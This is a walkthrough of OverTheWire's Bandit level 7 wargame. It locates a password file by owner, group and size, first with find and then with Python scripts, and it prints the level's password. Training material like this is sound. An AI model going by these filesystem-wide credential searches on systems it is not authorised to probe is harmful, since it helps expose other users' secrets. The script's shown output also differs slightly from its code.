
Over the Wire - Bandit 7

Bandit 7


Objectives
Level Goal
The password for the next level is stored somewhere on the server and has all of the following properties:
  • owned by user bandit7
  • owned by group bandit6
  • 33 bytes in size

Solution

So we are looking for a file owned by user bandit7 and group bandit6, somewhere on the server.

I started by running cd .. all the way up to the root directory, and from there ran the command find * -user bandit7 -group bandit6


bandit6@bandit:/$ find * -user bandit7 -group bandit6
find: ‘boot/lost+found’: Permission denied
find: ‘cgroup2/csessions’: Permission denied
find: ‘etc/ssl/private’: Permission denied
find: ‘etc/lvm/backup’: Permission denied
find: ‘etc/lvm/archive’: Permission denied
find: ‘etc/polkit-1/localauthority’: Permission denied
find: ‘home/bandit28-git’: Permission denied
find: ‘home/bandit30-git’: Permission denied
find: ‘home/bandit31-git’: Permission denied
find: ‘home/bandit5/inhere’: Permission denied
find: ‘home/bandit27-git’: Permission denied
find: ‘home/bandit29-git’: Permission denied
find: ‘lost+found’: Permission denied
find: ‘proc/tty/driver’: Permission denied
find: ‘proc/30734/task/30734/fd/6’: No such file or directory
find: ‘proc/30734/task/30734/fdinfo/6’: No such file or directory
find: ‘proc/30734/fd/5’: No such file or directory
find: ‘proc/30734/fdinfo/5’: No such file or directory
find: ‘root’: Permission denied
find: ‘run/lvm’: Permission denied
find: ‘run/screen/S-bandit0’: Permission denied
find: ‘run/screen/S-bandit13’: Permission denied
find: ‘run/screen/S-bandit1’: Permission denied
find: ‘run/screen/S-bandit10’: Permission denied
find: ‘run/screen/S-bandit4’: Permission denied
find: ‘run/screen/S-bandit3’: Permission denied
find: ‘run/screen/S-bandit22’: Permission denied
find: ‘run/screen/S-bandit18’: Permission denied
find: ‘run/screen/S-bandit17’: Permission denied
find: ‘run/screen/S-bandit25’: Permission denied
find: ‘run/screen/S-bandit9’: Permission denied
find: ‘run/screen/S-bandit16’: Permission denied
find: ‘run/screen/S-bandit5’: Permission denied
find: ‘run/screen/S-bandit19’: Permission denied
find: ‘run/screen/S-bandit7’: Permission denied
find: ‘run/screen/S-bandit33’: Permission denied
find: ‘run/screen/S-bandit29’: Permission denied
find: ‘run/screen/S-bandit28’: Permission denied
find: ‘run/screen/S-bandit27’: Permission denied
find: ‘run/screen/S-bandit21’: Permission denied
find: ‘run/screen/S-bandit15’: Permission denied
find: ‘run/screen/S-bandit31’: Permission denied
find: ‘run/screen/S-bandit30’: Permission denied
find: ‘run/screen/S-bandit14’: Permission denied
find: ‘run/screen/S-bandit2’: Permission denied
find: ‘run/screen/S-bandit24’: Permission denied
find: ‘run/screen/S-bandit23’: Permission denied
find: ‘run/screen/S-bandit20’: Permission denied
find: ‘run/shm’: Permission denied
find: ‘run/lock/lvm’: Permission denied
find: ‘sys/fs/pstore’: Permission denied
find: ‘tmp’: Permission denied
find: ‘var/spool/bandit24’: Permission denied
find: ‘var/spool/rsyslog’: Permission denied
find: ‘var/spool/cron/crontabs’: Permission denied
find: ‘var/log’: Permission denied
find: ‘var/tmp’: Permission denied
find: ‘var/cache/ldconfig’: Permission denied
find: ‘var/cache/apt/archives/partial’: Permission denied
var/lib/dpkg/info/bandit7.password
find: ‘var/lib/apt/lists/partial’: Permission denied
find: ‘var/lib/polkit-1’: Permission denied


I see something towards the end that is probably what we are looking for, but let's get rid of all those "Permission denied" entries by sending standard error to /dev/null.

bandit6@bandit:/$ find * -user bandit7 -group bandit6 2>/dev/null
var/lib/dpkg/info/bandit7.password

Much better. There is a file in /var/lib/dpkg/info called bandit7.password. I'm pretty sure that's the file we are looking for, but let's take a look at the size just to be sure.

bandit6@bandit:/$ ls /var/lib/dpkg/info/ -ls | grep 'bandit7.password'
   4 -rw-r----- 1 bandit7 bandit6      33 Oct 16  2018 bandit7.password

Yup, 33 bytes (the size column in ls -l is in bytes), owned by bandit7 and group bandit6, exactly as the objective says.

Let's see what's in there.

bandit6@bandit:/$ cat /var/lib/dpkg/info/bandit7.password
HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs


Cool, found this one using bash. Now I'll spend some time torturing myself to figure out how to do it in Python :)

So here is what I pieced together in Python.

I re-used a lot of the code from the last Bandit level.

Added os.stat(filevar).st_uid to get the numeric user id of the owner
Added os.stat(filevar).st_gid to get the numeric group id

Converted those ids to names using
pwd.getpwuid(varfileowner)[0]
grp.getgrgid(varfilegroup)[0]

Then added a couple of "and" conditions to my if statement to check that the owner and group names match those in the instructions.

Since we are walking the whole directory structure of /, I found a little snippet on the interwebs that redirects error messages to a DevNull object to keep them from printing on the screen.






#Import the modules we need
import os
import grp, pwd, sys

#Anything written to this object is silently dropped
class DevNull:
    def write(self, msg):
        pass

#Send error messages to DevNull instead of the screen while walking /
sys.stderr = DevNull()

#Set listing start location
dir_count = 0
file_count = 0
#Traverse directory tree
for (path, dirs, files) in os.walk(os.curdir):
    dir_count += 1
    #Repeat for each file in directory
    for file in files:
        try:
            filevar = os.path.join(path, file)
            #print('filevar is', filevar)
            varfilesize = os.path.getsize(filevar)
            varfileowner = os.stat(filevar).st_uid                #numeric user id
            varfilegroup = os.stat(filevar).st_gid                #numeric group id
            varfileownername = pwd.getpwuid(varfileowner)[0]      #user id -> name
            varfilegroupname = grp.getgrgid(varfilegroup)[0]      #group id -> name
            if varfilesize == 33 and varfileownername == 'bandit7' and varfilegroupname == 'bandit6':
                print('Bingo file found*****************************')
                print(filevar, varfilesize)
                print('owner is ', varfileownername)
                print('group is ', varfilegroupname)
                #Print the contents and close the file when done
                with open(filevar) as filetmp:
                    print(filetmp.read())
        except Exception as err:
            #Unreadable file, or an id with no passwd/group entry: skip it
            pass
        file_count += 1



Here is the output of the Python script

Bingo file found*****************************
('./var/lib/dpkg/info/bandit7.password', 33)
('onwer is ', 'bandit7')
('group is ', 'bandit6')
'HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs\n'
Bingo file found*****************************
('./proc/1521/task/1521/fd/4', 33)
('onwer is ', 'bandit7')
('group is ', 'bandit6')
'HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs\n'
Bingo file found*****************************
('./proc/1521/fd/3', 33)
('onwer is ', 'bandit7')
('group is ', 'bandit6')
'HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs\n'
Bingo file found*****************************
('./proc/1521/fd/4', 33)
('onwer is ', 'bandit7')
('group is ', 'bandit6')
'HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs\n'
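The extra hits under ./proc/1521/fd/ in that output are almost certainly the script finding itself: os.stat follows symlinks, and the entries in /proc/<pid>/fd are symlinks to whatever that process has open, which here is the password file the script opened and never closed. The following is an added example, not the original script from this post, showing a reusable version of the same search that uses os.lstat so symlinks are never followed, keeps only regular files, closes what it opens, and records directories it could not enter instead of hiding the errors. The function names, the temporary sample tree and the 32-character placeholder content are all constructed for this example; on the Bandit host the equivalent call would be find_files_by_owner('/', user='bandit7', group='bandit6', size=33).

```python
import grp
import os
import pwd
import stat
import tempfile


def owner_names(st):
    """Map the numeric uid/gid of a stat result to names, falling back to the
    number as a string when the id has no passwd/group entry (the original
    script would raise KeyError here and skip the file)."""
    try:
        owner = pwd.getpwuid(st.st_uid).pw_name
    except KeyError:
        owner = str(st.st_uid)
    try:
        group = grp.getgrgid(st.st_gid).gr_name
    except KeyError:
        group = str(st.st_gid)
    return owner, group


def find_files_by_owner(root, user=None, group=None, size=None):
    """Walk `root` and return (matches, errors).

    matches: list of (path, owner, group, size) for regular files whose owner
             name, group name and exact size in bytes match the criteria
             given (a criterion left as None is ignored).
    errors:  OSError instances for directories os.walk could not enter, so a
             "Permission denied" is recorded rather than silently dropped.
    """
    matches = []
    errors = []
    for path, _dirs, files in os.walk(root, onerror=errors.append):
        for name in files:
            full = os.path.join(path, name)
            try:
                st = os.lstat(full)  # lstat: never follow symlinks such as /proc/<pid>/fd/N
            except OSError as err:
                errors.append(err)
                continue
            if not stat.S_ISREG(st.st_mode):
                continue  # symlinks, sockets and device nodes can never be the answer
            if size is not None and st.st_size != size:
                continue
            owner, grp_name = owner_names(st)
            if user is not None and owner != user:
                continue
            if group is not None and grp_name != group:
                continue
            matches.append((full, owner, grp_name, st.st_size))
    return matches, errors


def read_password(path):
    """Read a one-line password file and close the handle afterwards, so the
    file does not linger in our own /proc/<pid>/fd and match a second time."""
    with open(path) as fh:
        return fh.read().strip()


def build_sample_tree():
    """Constructed stand-in for the Bandit filesystem: one 33-byte file, a
    decoy of a different size and a symlink that mimics /proc/<pid>/fd/N."""
    root = tempfile.mkdtemp(prefix="bandit7_demo_")
    info = os.path.join(root, "info")
    os.makedirs(info)
    password_file = os.path.join(info, "bandit7.password")
    with open(password_file, "wb") as fh:
        fh.write(b"x" * 32 + b"\n")  # constructed placeholder: 32 chars + newline = 33 bytes
    with open(os.path.join(info, "other.txt"), "wb") as fh:
        fh.write(b"0123456789")  # 10 bytes, must not match
    try:
        os.symlink(password_file, os.path.join(root, "fd_4"))  # stand-in for a /proc fd link
    except OSError:
        pass  # symlinks unavailable on this platform; the demo still works
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    matches, errors = find_files_by_owner(root, size=33)
    for path, owner, group, nbytes in matches:
        print(path, owner, group, nbytes)
        print(read_password(path))
    print("unreadable directories:", len(errors))
```

On the sample tree the symlink is skipped and only info/bandit7.password is reported once, which is the behaviour the original os.stat-based loop lacked. Because the test environment cannot chown files to bandit7, the ownership filter is exercised with whatever user and group own the temporary files.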





